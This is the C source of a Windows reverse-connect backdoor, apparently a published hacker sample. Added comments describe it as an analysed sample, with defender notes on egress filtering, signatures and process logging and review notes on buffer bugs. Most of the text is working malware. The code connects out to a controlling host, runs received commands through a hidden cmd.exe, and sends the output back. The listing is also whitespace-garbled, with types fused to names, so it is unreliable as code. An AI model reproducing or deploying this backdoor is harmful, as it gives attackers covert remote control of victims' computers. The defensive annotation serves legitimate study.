反向连接后门源码

#include < winsock2.h >
#include
< stdio.h >

#pragma comment(lib,"ws2_32.lib")

// Sample: reverse-connect ("connect-back") remote shell for Windows, kept
// verbatim for analysis. The listing is whitespace-damaged by page extraction
// (several declarations have the type fused to the name), so the code is left
// exactly as published and only the commentary is new.
//
// Behaviour visible in this function:
//   1. Initialises Winsock and opens an outbound TCP connection to a
//      hard-coded address and port (127.0.0.1:80 in this sample).
//   2. Sends a fixed banner string to the peer.
//   3. Loops forever: reads bytes from the socket, appends them to
//      "<system directory>\cmd.exe/c " and starts that command line with
//      CreateProcess (window hidden, stdout/stderr redirected to an anonymous
//      pipe), then sends whatever it reads from the pipe back to the peer.
//
// Defender notes:
//   - The connection is initiated from the host outwards, so inbound firewall
//     rules do not stop it; egress filtering and monitoring of outbound
//     connections by unexpected processes are the relevant controls.
//   - The traffic on port 80 is a raw byte stream, not HTTP; protocol
//     validation on a proxy or IDS would flag it.
//   - No authentication or encryption code is present: commands and output
//     cross the network in cleartext and the peer is never verified.
//   - The banner literal below is a static string usable as a file or network
//     content signature.
//   - Each command creates a cmd.exe child with a hidden window and inherited
//     pipe handles; process-creation logging (Windows Security 4688, Sysmon
//     event 1) records the parent/child pair and the command line.
//
// argc and argv are not used. Nothing is returned; failures are printed and
// the function returns early.
void main( int argc, char ** argv)
{
// Fixed banner sent to the peer right after the connection is established.
char * messages = " ========================BackConnectBackDoorV0.1======================== =========WelcometoHttp://www.hackerxfiles.net========= " ;
WSADATAWSAData;
SOCKETsock;
SOCKADDR_INaddr_in;
char buf1[ 1024 ]; // buffer for data received from the socket
memset(buf1, 0 , 1024 ); // zero the buffer (done once, before the loop only)

// Winsock 2.0 is requested; on failure the error is printed and the program ends.
if (WSAStartup(MAKEWORD( 2 , 0 ), & WSAData) != 0 )
{
printf(
" WSAStartuperror.Error:d " ,WSAGetLastError());
return ;
}

addr_in.sin_family
= AF_INET;
addr_in.sin_port
= htons( 80 ); // port of the remote host for the reverse connection
addr_in.sin_addr.S_un.S_addr = inet_addr( " 127.0.0.1 " ); // remote IP (loopback in this sample)

if ((sock = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP)) == INVALID_SOCKET)
{
printf(
" Socketfailed.Error:d " ,WSAGetLastError());
return ;
}
if (WSAConnect(sock,( struct sockaddr * ) & addr_in, sizeof (addr_in),NULL,NULL,NULL,NULL) == SOCKET_ERROR) // connect out to the controlling host
{
printf(
" Connectfailed.Error:d " ,WSAGetLastError());
return ;
}

if (send(sock,messages,strlen(messages), 0 ) == SOCKET_ERROR) // send the welcome banner
{
printf(
" Sendfailed.Error:d " ,WSAGetLastError());
return ;
}

char buffer[ 2048 ] = { 0 }; // data read from the pipe (child process output)

// One iteration per received command; cmdline is zeroed at the end of each
// pass by the for-increment expression. There is no exit condition here.
for ( char cmdline[ 270 ];;memset(cmdline, 0 , sizeof (cmdline))){
SECURITY_ATTRIBUTESsa;
// create an anonymous pipe used to capture cmd's command output
HANDLEhRead,hWrite;
sa.nLength
= sizeof (SECURITY_ATTRIBUTES);
sa.lpSecurityDescriptor
= NULL;
// Inheritable handles: the child process receives the pipe ends.
sa.bInheritHandle
= TRUE;
if ( ! CreatePipe( & hRead, & hWrite, & sa, 0 ))
{
printf(
" ErrorOnCreatePipe() " );
return ;
}

STARTUPINFOsi;
PROCESS_INFORMATIONpi;
si.cb
= sizeof (STARTUPINFO);
GetStartupInfo(
& si);
// Child stdout and stderr both go to the write end of the pipe, and the
// child window is hidden, so nothing is shown on the desktop.
si.hStdError
= hWrite;
si.hStdOutput
= hWrite;
si.wShowWindow
= SW_HIDE;
si.dwFlags
= STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;

// Command line starts with the system directory followed by the cmd.exe suffix.
GetSystemDirectory(cmdline,MAX_PATH
+ 1 );
strcat(cmdline,
" \cmd.exe/c " );

// NOTE(review): buf1 is not cleared between iterations, and a full 1024-byte
// read leaves it without a terminating NUL for the strlen() call below.
int len = recv(sock,buf1, 1024 ,NULL);
if (len == SOCKET_ERROR)exit( 0 ); // exit the program if the client connection failed
// NOTE(review): a return of 0 (peer closed the connection) also takes this
// branch and loops again; the pipe handles created above are not closed here.
if (len <= 1 ){send(sock, " error " , sizeof ( " error " ), 0 ); continue ;}


// NOTE(review): the bound is strlen(buf1), the source length, not the space
// left in the 270-byte cmdline, so received data can overrun the stack buffer.
strncat(cmdline,buf1,strlen(buf1));
// append the received command arguments to cmdline
// Network-supplied text is executed as a cmd.exe command with handle
// inheritance enabled (fifth argument TRUE).
if ( ! CreateProcess(NULL,cmdline,NULL,NULL,TRUE,NULL,NULL,NULL, & si, & pi))
{
send(sock,
" Errorcommand " , sizeof ( " Errorcommand " ), 0 );
continue ;
}

// The parent drops its write end; presumably this is what lets ReadFile
// fail, and the loop below end, once the child has exited.
CloseHandle(hWrite);
// loop reading data from the pipe and sending it, until the pipe has no more data
// NOTE(review): strlen(buffer) is used as the send length, so a full
// 2048-byte read has no terminator and output containing a zero byte is cut
// short. hRead, pi.hProcess and pi.hThread are never closed in this listing.
for (DWORDbytesRead;ReadFile(hRead,buffer, 2048 , & bytesRead,NULL);memset(buffer, 0 , 2048 )){
send(sock,buffer,strlen(buffer),
0 );
}
}

}
